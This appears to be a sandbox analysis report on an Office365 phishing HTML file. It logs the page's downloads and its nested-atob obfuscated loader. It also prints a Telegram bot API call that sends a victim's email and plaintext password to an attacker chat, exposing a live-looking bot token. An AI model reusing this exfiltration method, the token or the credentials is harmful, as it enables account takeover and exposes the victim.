                        URL:"https://api.telegram.org/bot6299120601:AAFjTF1nw1mX4IfZ5iID5kg7WRm_MNdlcuw/sendMessage?chat_id=-801041529&text=%3Cb%3EOFFICE365-HTML-LOGS@ZERO%3C/b%3E%0A[1]%2021/03/2023%0A%3Cb%3EUSER-AGENT:%20%3C/b%3EMozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/104.0.0.0%20Safari/537.36%0A%3Ca%3Esee%20me:%20@mrcew%3C/a%3E%0A%3Cb%3EEMAIL:%20%3C/b%3E%3Cpre%3Evdaponte@sumhlc.org%3C/pre%3E%0A%3Cb%3EPASSWORD:%20%3C/b%3E%3Ca%3Etemeper23"
                        Preview:{"ok":true,"result":{"message_id":282,"from":{"id":6299120601,"is_bot":true,"first_name":"asgardnewbox_2023LOGS","username":"asgardnewbox_2023LOGS_bot"},"chat":{"id":-801041529,"title":"asgarrd","type":"group","all_members_are_administrators":true},"date":1679409825,"text":"<b>OFFICE365-HTML-LOGS@ZERO</b>\n[1] 21/03/2023\n<b>USER-AGENT: </b>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n<a>see me: @mrcew</a>\n<b>EMAIL: </b><pre>vdaponte@sumhlc.org</pre>\n<b>PASSWORD: </b><a>temeper23","entities":[{"offset":154,"length":9,"type":"url"},{"offset":189,"length":6,"type":"mention"},{"offset":219,"length":19,"type":"email"}]}}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (65398)
                        Category:downloaded
                        Size (bytes):139129
                        Entropy (8bit):5.444859220439254
                        Encrypted:false
                        SSDEEP:
                        MD5:49BFEAE3B40B37A8F951103046309AD9
                        SHA1:873A7A11FA10401D6D10005E8DBAD6E58DDB7AA1
                        SHA-256:7F5B64709E131C5C20CDB5E3769003FF946C4BEE28852E32C590D2E058127597
                        SHA-512:6B4FAF35A9DC0D07C0D4EECAF730A40A8A15662AC6A5886F20E975F1181EF7BF7EBBB3D6DDB4B9AFE1E385B33B8E084E54D5A707378AEC6DCA2C261D2913B03E
                        Malicious:false
                        Reputation:low
                        URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.2.7.min.js
                        Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.7. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,t=function(n){"use strict";var u="function",s="object",le="undefined",f="prototype",l="hasOwnProperty",g=Object,v=g[f],y=g.assign,T=g.create,e=g.defineProperty,I=v[l],C=null;function b(e){return void 0===e&&(e=!0),C&&e||(typeof globalThis!==le&&globalThis&&(C=globalThis),typeof self!==le&&self&&(C=self),typeof window!==le&&window&&(C=window),typeof global!==le&&global&&(C=global)),C}function S(e){throw new TypeError(e)}function M(e){var t;return T?T(e):null==e?{}:((t=typeof e)!==s&&t!==u&&S("Object prototype may only be an Object:"+e),n[f]=e,new n);function n(){}}(b()||{}).Symbol,(b()||{}).Reflect;var fe=y||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])v[l].call(t,r)&&(e[r]=t[r]);return e},N=function(e,t){return(N=g.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):250
                        Entropy (8bit):4.880286917856239
                        Encrypted:false
                        SSDEEP:
                        MD5:6A3F795F0177F117E6EBB553F149D215
                        SHA1:9CBB868DED202E40E1B6EFBE90EC15913766DB59
                        SHA-256:6B49D4E424938A8828B2A155FF0FA364945C3246AE0797BC2FEF9A83823EAFFF
                        SHA-512:EF85386CAF2AC7126D082E34ED9F7AF71BCF83C8001A28E56F3374941944011DC3C88D8CADED38787CCFE816009F18DBB1428C68B9F3769F9BEA40119CB45EF0
                        Malicious:false
                        Reputation:low
                        URL:https://ipinfo.io/json
                        Preview:{. "ip": "102.129.143.5",. "city": "H.nenberg",. "region": "Zug",. "country": "CH",. "loc": "47.1754,8.4250",. "org": "AS212238 Datacamp Limited",. "postal": "6331",. "timezone": "Europe/Zurich",. "readme": "https://ipinfo.io/missingauth".}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:SVG Scalable Vector Graphics image
                        Category:downloaded
                        Size (bytes):1555
                        Entropy (8bit):3.9986369032270845
                        Encrypted:false
                        SSDEEP:
                        MD5:BCB4D1DC4EAE64F0B2B2538209D8435A
                        SHA1:4F10568BC1B70BC98D5297B85812C33B3E636766
                        SHA-256:A76C08E9CDC3BB87BFB57627AD8F6B46F0E5EF826CC7F046DFBAF25D7B7958EA
                        SHA-512:DB41DE25233B7000DD841D244CA2A7504E4B1443A7CF41AA88136764EEB3002B3B99D0E8B31A828AFE4749F454ADCF5D2E4F9F72D645F0A6E66918B5E5A8A7B1
                        Malicious:false
                        Reputation:low
                        URL:https://logincdn.msauth.net/shared/1.0/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg
                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path d="M8,0a7.876,7.876,0,0,1,2.126.285,8.011,8.011,0,0,1,5.589,5.589,8.072,8.072,0,0,1,0,4.252,8.011,8.011,0,0,1-5.589,5.589,8.072,8.072,0,0,1-4.252,0A8.011,8.011,0,0,1,.285,10.126a8.072,8.072,0,0,1,0-4.252A8.011,8.011,0,0,1,5.874.285,7.876,7.876,0,0,1,8,0M8,15a6.863,6.863,0,0,0,1.858-.251,7.076,7.076,0,0,0,1.673-.707,6.994,6.994,0,0,0,2.507-2.507,7.076,7.076,0,0,0,.707-1.673,7,7,0,0,0,0-3.716,7.076,7.076,0,0,0-.707-1.673,6.994,6.994,0,0,0-2.507-2.507,7.076,7.076,0,0,0-1.673-.707,7,7,0,0,0-3.716,0,7.076,7.076,0,0,0-1.673.707A6.994,6.994,0,0,0,1.962,4.469a7.076,7.076,0,0,0-.707,1.673,7,7,0,0,0,0,3.716,7.076,7.076,0,0,0,.707,1.673,6.994,6.994,0,0,0,2.507,2.507,7.076,7.076,0,0,0,1.673.707A6.863,6.863,0,0,0,8,15m-.536-3.247H8.536V12.82H7.464V11.749M8,3.715a2.558,2.558,0,0,1,1.038.214,2.737,2.737,0,0,1,1.426,1.427,2.533,2.533,0,0,1,.214,1.037,2.215,2.215,0,0,1-.159.875,2.921,2.921,0,0,
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (65518), with no line terminators
                        Category:downloaded
                        Size (bytes):131952
                        Entropy (8bit):5.245222429754902
                        Encrypted:false
                        SSDEEP:
                        MD5:3D31F4B722BAAAAF922911817D23EB0B
                        SHA1:67B66EA9B1D0CA23FAD6407F75B6114739D96CC9
                        SHA-256:139092C5F8D46536023B1E564CAEA7D460A14E731D82C31BE4BB80A7E5BAD4B9
                        SHA-512:0243BAE79FAA7EF5962BF2E1CBD38585F5A88700883620902452F568C05158C7D1DCE1EA3FD5CC8BF00ECCE6EA4829DCA6A7710D9498D9E16E4137E8D519FAAF
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/SocContent/articleCss
                        Preview:@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}html[dir="rtl"] .supHomeAndLandingPageSearchButton{right:auto;left:0}html[dir="rtl"] .supHomeAndLandingPageSearchBox{padding:0 18px 0 50px}.supHomeAndLandingPageSearchBoxForm{margin:auto;position:relative;max-width:748px}.supHomeAndLandingPageSearchBoxForm .supSuggestionList{margin:0;padding:0;list-style:none}.supHomeAndLandingPageSearchBoxForm .supAutoSuggestContainer{width:100%}.supHomeAndLandingPageSearchBoxForm .supSuggestionItem{text-indent:0;padding-left:18px}.supHomeAndLandingPageSearchBoxContainer{position:relative}.supHomeAndLandingPageSearchBox{width:100%;height:51px;font-size:1.7em;padding:0 50px 0 18px;border:1px solid #
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 1200 x 1172, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):69550
                        Entropy (8bit):7.872116071617606
                        Encrypted:false
                        SSDEEP:
                        MD5:EF24D7B889669ED456F3BB700F8482CD
                        SHA1:281923FC8E690D4E893453CBEA3B8B067CDAA4C0
                        SHA-256:6B286061B95C551419AEE456F6FEA1B09BCA0322F13BED4301FA8F944B121264
                        SHA-512:E27AD238012CFF7EAA024BB2F52C089B213D7AE6EA4496B3D5A143FADD57B6E45BB5F4AE5E8F17A37C7F93E15D574E96A816D0BD16A4AAD268D4A9AF7615C22C
                        Malicious:false
                        Reputation:low
                        File type:HTML document, ASCII text, with very long lines (59971), with CRLF line terminators
                        Entropy (8bit):5.4082875439575435
                        TrID:
                        • HyperText Markup Language (15015/1) 55.58%
                        • HyperText Markup Language (12001/1) 44.42%
                        File name:ScannedFileCopy8475.html
                        File size:920362
                        MD5:9a580f2e9f88aad5f60b02d775596e37
                        SHA1:f9b1a8953113077f96acb4264754e94964d14d43
                        SHA256:f31f1852b141c2680ada8b4b977b6cf150efbda99a584e858a21b332452f2626
                        SHA512:c5725e9180c44f1a974f86fd9b954328f4b55cfb991e44e015578904b2476932dd752f8f40d998acfac5d1087fde12ee8beab083697a871cb4d502f74f4e4ce3
                        SSDEEP:24576:GlES4FbxosB/MK0cJLELW2Tzo1PE0RPew/AcEWw+dGoxGcTIlKm9f3fIw7Ur/0dz:Ks8aSZ
                        TLSH:D7155B13AF95DEFA9B8D5A0D54492B1C83F0711A7E23D01EED919BC4FB86C0742DA12E
                        File Content Preview:<!DOCTYPE html>..<html id="rrt" ssvv="vdaponte@sumhlc.org" lang="en">....<head></head>.. jjhhdh -->....<body style="display: none;" id="bbdy">.... <script>.. document.head.insertAdjacentHTML("beforeend", atob(atob(atob(atob(atob(atob(atob(at